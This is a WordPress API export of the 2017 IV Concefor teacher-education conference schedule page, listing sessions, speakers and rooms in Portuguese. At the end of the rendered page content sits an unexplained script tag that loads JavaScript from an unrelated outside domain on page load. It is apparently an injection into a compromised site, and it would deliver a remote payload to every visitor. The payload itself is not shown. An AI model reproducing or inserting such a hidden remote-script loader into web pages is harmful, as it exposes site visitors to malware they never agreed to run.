{"id":20,"date":"2016-04-12T13:35:54","date_gmt":"2016-04-12T13:35:54","guid":{"rendered":"http:\/\/concefor.cefor.ifes.edu.br\/?page_id=20"},"modified":"2018-01-16T10:39:54","modified_gmt":"2018-01-16T12:39:54","slug":"programacao","status":"publish","type":"page","link":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/programacao\/","title":{"rendered":"Programa\u00e7\u00e3o"},"content":{"rendered":"<p>&nbsp;<\/p>\n<h4>Dia 10\/08\/2017 &#8211; Quinta-feira<\/h4>\n<table style=\"border-collapse: collapse; table-layout: fixed; width: 799px; height: 406px;\" border=\"0\" width=\"361\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; width: 66pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59;\" width=\"66\" height=\"15\">Hor\u00e1rio<\/td>\n<td style=\"width: 213pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59; border-left: none;\" width=\"213\">Evento<\/td>\n<td style=\"width: 82pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59; border-left: none;\" width=\"82\">Local<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">16h30 &#8211; 18h30<br \/>\n<span style=\"display: none;\">0<\/span><\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Credenciamento<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">17h &#8211; 17h30<br \/>\n<span style=\"display: none;\">0<\/span><\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Recep\u00e7\u00e3o dos participantes<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\" height=\"15\">17h30 &#8211; 18h00<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">Momento cultural (Banda da Pol\u00edcia Militar)<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">18h00 &#8211; 19h00<br \/>\n<span style=\"display: none;\">0<\/span><\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Abertura oficial<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\" height=\"15\">19h00 &#8211; 20h30<br \/>\n<span style=\"display: none;\">0<\/span><\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">Palestra de Abertura:\u00a0Interconex\u00f5es entre Educa\u00e7\u00e3o e Tecnologias na EaD<\/p>\n<p>Palestrante: Mara Lucia Fernandes Carneiro (UFRS).<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>Dia 11\/08\/2017 &#8211; Sexta-feira<\/h4>\n<table style=\"border-collapse: collapse; table-layout: fixed; width: 800px; height: 387px;\" border=\"0\" width=\"361\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; width: 66pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59; border-left: none;\" width=\"66\" height=\"15\">Hor\u00e1rio<\/td>\n<td style=\"width: 213pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59; border-left: none;\" width=\"213\">Evento<\/td>\n<td style=\"width: 82pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59; border-left: none;\" width=\"82\">Local<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">8h00 &#8211; 09h30<br \/>\n<span style=\"display: none;\">0<\/span><\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Comunica\u00e7\u00e3o Oral*<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Salas 1, 2, 3, 4 e Audit\u00f3rio<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">09h30 &#8211; 10h00<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Coffee Break e Momento Cultural<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\" height=\"15\">10h00 &#8211; 12h00<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">Palestra \u201cO Papel da Lesson Study (Pesquisa de Aula) nas Tend\u00eancias Recentes da Pesquisa sobre Forma\u00e7\u00e3o de Professores\u201d<\/p>\n<p>Palestrante: Yuriko Yamamoto Baldin &#8211; UFSCar<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">P\u00e1tio do Cefor<br \/>\n<span style=\"display: none;\">a<\/span><\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">12h00 &#8211; 13h30<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Almo\u00e7o<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\"><\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\" height=\"15\">13h30 &#8211; 15h30<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">Grupos de Trabalho (GT)**<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">P\u00e1tio do Cefor, Audit\u00f3rio, Salas 1, 2, 3 e 4<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">15h30 &#8211; 16h00<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Coffee Break e Apresenta\u00e7\u00e3o de P\u00f4steres<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\" height=\"15\">16h00 &#8211; 18h00<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">Mesa Redonda: \u201cForma\u00e7\u00e3o inicial e continuada de professores\u201d<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>Mesa Redonda \u2013 Forma\u00e7\u00e3o de Professores<\/strong><br \/>\n<strong>Tema<\/strong>: \u201cForma\u00e7\u00e3o inicial e continuada de professores\u201d<br \/>\n<strong>Mediadora<\/strong>: \u00a0Dra. Maria Auxiliadora Vilela Paiva (Cefor\/Ifes)<br \/>\n<strong>Participantes<\/strong>: Yuriko Yamamoto Baldin (UFSCar), Julia Schaetzle Wrobel (Ufes) e Sidnei Quezada (Cefor\/Ifes)<\/p>\n<p>(*): A programa\u00e7\u00e3o das comunica\u00e7\u00f5es orais\u00a0estar\u00e1 dispon\u00edvel em breve.<\/p>\n<p>(*): O caderno de resumos do IV Concefor estar\u00e1 dispon\u00edvel em breve.<\/p>\n<p>(**):\u00a0Mais informa\u00e7\u00f5es sobre os GT na p\u00e1gina\u00a0<a href=\"http:\/\/concefor.cefor.ifes.edu.br\/grupos-de-trabalhos\/\">Grupos de Trabalho.<\/a><\/p>\n<p>&nbsp;<\/p>\n<h4>Dia 12\/08\/2016 &#8211;\u00a0S\u00e1bado<\/h4>\n<table style=\"border-collapse: collapse; table-layout: fixed; width: 800px; height: 387px;\" border=\"0\" width=\"361\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; width: 66pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59;\" width=\"66\" height=\"15\">Hor\u00e1rio<\/td>\n<td style=\"width: 213pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59; border-left: none;\" width=\"213\">Evento<\/td>\n<td style=\"width: 82pt; font-size: 12.0pt; color: #76933c; font-weight: bold; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; border-top: .5pt solid #9BBB59; border-bottom: .5pt solid #9BBB59; border-left: none;\" width=\"82\">Local<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">08h00 \u00e0s 9h30<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Comunica\u00e7\u00e3o Oral<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Salas 1, 2, 3, 4 e Audit\u00f3rio<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\" height=\"15\">09h30 \u00e0s10h00<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">Coffee Break, Momento Cultural (Grupo Musical) e\u00a0Comemora\u00e7\u00e3o de anivers\u00e1rio do Cefor.<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">10h00 \u00e0s12h00<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Mesa Redonda: \u201cMetodologias ativas e inovadoras\u201d<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\" height=\"15\">12h00 \u00e0s 12h30<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">Apresenta\u00e7\u00e3o dos GT<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri; mso-pattern: #EBF1DE none;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\" height=\"15\">12h30 \u00e0s 12h40<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">Premia\u00e7\u00e3o dos melhores trabalhos<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<tr style=\"height: 15.0pt;\">\n<td style=\"height: 15.0pt; font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\" height=\"15\">12h40 \u00e0s 13h00<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">Encerramento<\/td>\n<td style=\"font-size: 12.0pt; color: #76933c; font-weight: 400; text-decoration: none; text-underline-style: none; text-line-through: none; font-family: Calibri;\">P\u00e1tio do Cefor<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>Mesa Redonda &#8211; EaD<\/strong><br \/>\n<strong>Tema<\/strong>: \u201cMetodologias ativas e inovadoras\u201d<br \/>\n<strong>Mediadora<\/strong>: Msc. Yvina Pavan Baldo (Cefor\/Ifes).<br \/>\n<strong>Participantes<\/strong>: J\u00falia Marques Carvalho da Silva (IFRS), Sergio Ant\u00f4nio Andrade de Freitas (UNB), Isaura Alcina Martins Nobre (Cefor\/Ifes)<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Dia 10\/08\/2017 &#8211; Quinta-feira Hor\u00e1rio Evento Local 16h30 &#8211; 18h30 0 Credenciamento P\u00e1tio do Cefor 17h &#8211; 17h30 0 Recep\u00e7\u00e3o dos participantes P\u00e1tio do Cefor 17h30 &#8211; 18h00 Momento cultural (Banda da Pol\u00edcia Militar) P\u00e1tio do Cefor 18h00 &#8211; <a class=\"more-link\" href=\"https:\/\/concefor.cefor.ifes.edu.br\/2017\/programacao\/\">Leia mais&#8230; &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/wp-json\/wp\/v2\/pages\/20"}],"collection":[{"href":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/wp-json\/wp\/v2\/comments?post=20"}],"version-history":[{"count":2,"href":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/wp-json\/wp\/v2\/pages\/20\/revisions"}],"predecessor-version":[{"id":674,"href":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/wp-json\/wp\/v2\/pages\/20\/revisions\/674"}],"wp:attachment":[{"href":"https:\/\/concefor.cefor.ifes.edu.br\/2017\/wp-json\/wp\/v2\/media?parent=20"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}